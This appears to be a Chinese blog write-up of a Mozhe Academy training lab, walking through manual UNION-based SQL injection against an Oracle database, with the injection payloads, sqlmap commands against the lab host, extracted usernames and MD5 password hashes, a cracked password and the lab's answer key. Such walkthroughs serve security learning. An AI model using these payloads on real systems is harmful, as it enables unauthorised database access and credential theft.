当前位置: 首页 > article >正文

墨者学院 手工注入题解(oracle数据库)

article 2024/11/19 7:40:13

简介

       Oracle 数据库系统,是美国ORACLE公司(甲⻣⽂)提供的以分布式数据库为核⼼的⼀组软件 产品。是⽬前世界上使⽤最为⼴泛的,数据库管理系统。

以下是手工注入的流程:

1、判断注入点

使用  and 1=1  进行拼接

2、确定字段数

使用语句  order by

最终确定为只有两个字段

 

3、确定返回点

使用语句  ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句    sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db   查看当前数据库

5、确定数据库中的表名

使用语句   sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句     id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual     进行模糊搜索

确定第一列为  user_name  

使用语句   id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual  进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句   new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong  的密码为    1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定  hu  的密码为  1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为  48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定  mozhe  的密码为  267581

9、登录后台

10、提交KEY

KEY:mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民,网络安全为人民


http://www.kler.cn/a/282105.html

相关文章:

  • 学习threejs,使用AnimationMixer实现变形动画
  • 学习日记_20241117_聚类方法(高斯混合模型)
  • Spring Events在大型项目中的最佳实践
  • 「Mac玩转仓颉内测版14」PTA刷题篇5 - L1-005 考试座位号
  • 【MySQL】优化方向+表连接
  • 二、神经网络基础与搭建
  • 华为2016校园招聘上机笔试题
  • 取模+背包
  • 【Word与WPS如何冻结首行首列及窗口】
  • Linux常见基础命令
  • 责任链模式-升级版
  • python办公自动化:使用`Python-PPTX`进行文本框和段落操作
  • Python统计FreeMind测试用例数量
  • 【办公类-54-03】20240828班级点名册模版(双休国定假涂成灰色)
  • 网络层 I(网络层的功能)【★★★★★★】
  • wpf prism 《1》、区域 、模块化
  • 2024 年顶级 Flutter UI 框架和库
  • JAVA基础之二-面向对象简述
  • UE5学习笔记16-游戏模式中的一些事件,如何改变网格体和摄像头的碰撞
  • MosaicML-面向生成式AI的机器学习平台
  • 仅利用一维数组实现等值线图效果(附完整代码)
  • TeamTalk消息服务器学习
  • Nuxt3入门:介绍、项目安装和了解视图(第一节)
  • 【Android】Glide模块工作原理
  • 2024最全网络安全工程师面试题(附答案),金九银十找工作必看!
  • CARLA Drone: 首个实现从不同空中视角进行单目3D目标检测,并提供数据集